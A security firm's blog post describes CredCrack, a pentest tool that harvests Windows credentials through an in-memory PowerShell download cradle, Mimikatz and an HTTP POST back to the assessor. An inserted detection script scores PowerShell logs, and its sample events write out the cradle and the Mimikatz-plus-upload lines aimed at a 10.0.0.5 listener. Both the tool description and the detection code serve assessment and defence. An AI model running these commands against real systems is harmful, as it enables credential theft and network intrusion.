Posted by: Leap Security
Obtaining domain administrative privileges on a security assessment is a goal that many consultants desire. It is what fills us with excitement, as we know that the real fun is about to begin. After several assessments spent crunching through the same steps to obtain domain administrator privileges, I decided I wanted to expedite this process.
CredCrack was born.
CredCrack was developed in Python and made to be quick and quiet. It exfiltrates credentials that sit in memory and in the clear, while highlighting domain administrator accounts for you!
How it works
CredCrack begins by setting the stage. It will automatically start the Apache service and deploy two files to your /var/www directory: one named fun.ps1 and another named creds.php. Additionally, the assessor running the script is responsible for downloading Invoke-Mimikatz.ps1 and storing it in the same directory (/var/www).
After it is done setting up, CredCrack will validate the list of systems provided to ensure it can reach them and that they have port 445 open. It will remove systems that can’t be reached and proceed to query systems for the list of domain administrators.
Once the list of domain administrators has been obtained, CredCrack will begin harvesting all systems for credentials. It will send an initial PowerShell command asking the remote system to connect back to the assessor’s system, then download and execute the contents of fun.ps1 in memory.
The fun.ps1 PowerShell script will execute Mimikatz in memory and send the credentials back to the assessor’s system in a POST request (which creds.php intercepts).
CredCrack will continue harvesting credentials for all systems provided, then determine whether any domain administrator credentials were obtained by matching each username against the list of domain administrators previously obtained. After that, CredCrack will output the results, gracefully clean up and quit.
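The sequence above (download cradle, in-memory Mimikatz, HTTP POST of the results) leaves a recognisable trail in PowerShell script block logging. The following is an added detection example written for this post's readers on the defending side; it is not part of CredCrack and not code from Leap Security. It assumes script block text in the shape of Windows PowerShell event 4104 records, the sample events are constructed (hypothetical hosts, users and a 10.0.0.5 listener), and the indicator weights are an assumption you would tune against your own baseline.

```python
import re
from dataclasses import dataclass

# Constructed sample records (hypothetical), shaped like the ScriptBlockText
# field of PowerShell event 4104. None of these are real captures.
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "CORP\\svc_backup",
     "script": "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/fun.ps1')"},
    {"host": "WS01", "user": "CORP\\svc_backup",
     "script": "Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient)"
               ".UploadString('http://10.0.0.5/creds.php', $out)"},
    {"host": "WS02", "user": "CORP\\jdoe",
     "script": "Get-ChildItem C:\\Users\\jdoe\\Documents | Measure-Object"},
    {"host": "SRV01", "user": "CORP\\admin",
     "script": "powershell -NoP -W Hidden -EncodedCommand AAAAAAAAAAAAAAAAAAAA"},
]

# Indicator name, weight (assumed; tune to your environment), pattern.
INDICATORS = [
    ("download_cradle", 3, re.compile(r"(DownloadString|DownloadFile|Invoke-WebRequest|iwr)\b.*\.ps1", re.I)),
    ("inmemory_exec", 2, re.compile(r"\b(IEX|Invoke-Expression)\b", re.I)),
    ("mimikatz", 5, re.compile(r"Invoke-Mimikatz|sekurlsa|DumpCreds", re.I)),
    ("http_post_exfil", 3, re.compile(r"UploadString|UploadData|Invoke-RestMethod\s+-Method\s+Post", re.I)),
    ("encoded_command", 2, re.compile(r"-(e|enc|EncodedCommand)\s+[A-Za-z0-9+/=]{16,}", re.I)),
    ("hidden_window", 1, re.compile(r"-W(indowStyle)?\s+Hidden", re.I)),
]

ALERT_THRESHOLD = 5  # assumed cut-off: a cradle plus IEX, or Mimikatz alone, is enough


@dataclass
class Finding:
    host: str
    user: str
    score: int
    indicators: list
    verdict: str


def score_script_block(script):
    """Return (score, [indicator names]) for one script block."""
    hits = [name for name, _w, rx in INDICATORS if rx.search(script)]
    score = sum(w for name, w, _rx in INDICATORS if name in hits)
    return score, hits


def verdict_for(score):
    if score >= ALERT_THRESHOLD:
        return "alert"
    return "suspicious" if score > 0 else "benign"


def analyze(events):
    """Score every event; keep only those with at least one indicator."""
    findings = []
    for ev in events:
        score, hits = score_script_block(ev["script"])
        if hits:
            findings.append(Finding(ev["host"], ev["user"], score, hits, verdict_for(score)))
    return findings


def harvest_chains(findings):
    """Hosts where a download cradle was followed by Mimikatz or an HTTP upload:
    the full harvest-and-exfiltrate pattern rather than a lone indicator."""
    by_host = {}
    for f in findings:
        by_host.setdefault(f.host, set()).update(f.indicators)
    return sorted(host for host, inds in by_host.items()
                  if "download_cradle" in inds and inds & {"mimikatz", "http_post_exfil"})


if __name__ == "__main__":
    results = analyze(SAMPLE_EVENTS)
    for f in results:
        print(f"{f.verdict:10} {f.host:6} {f.user:18} score={f.score} {','.join(f.indicators)}")
    print("harvest chains on:", harvest_chains(results))
```

The per-event score catches each stage on its own, while harvest_chains correlates by host so a cradle and a later upload from the same machine surface together; in practice you would feed it 4104 events from your SIEM and pair the cradle hit with the web server's access log for the same .ps1 URL.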
Domain Administrator Credentials in 17 seconds
CredCrack has two main functionalities. It uses the provided local administrative user credentials either to enumerate share privileges or to harvest credentials across a network. One reason to use the share enumeration functionality is to determine whether the provided user has write or administrative access on a system. Refer to the syntax and example screenshot below for sample usage.
CredCrack’s most valuable functionality is its ability to harvest credentials. Refer to the syntax and example screenshot below for sample usage.
Awesome! It’s time to see CredCrack in action! The video below shows the use of CredCrack to obtain domain administrator credentials in 17 seconds.
CredCrack was made to facilitate obtaining domain administrator credentials on assessments. It has already helped us significantly on assessments and we hope it can help others as well. CredCrack does not have any dependencies other than Invoke-Mimikatz.ps1 if run on Kali Linux. For more information on CredCrack, visit its GitHub page. For information on defending against CredCrack and similar attacks, check out our blog post on defending against mass credential harvesting here.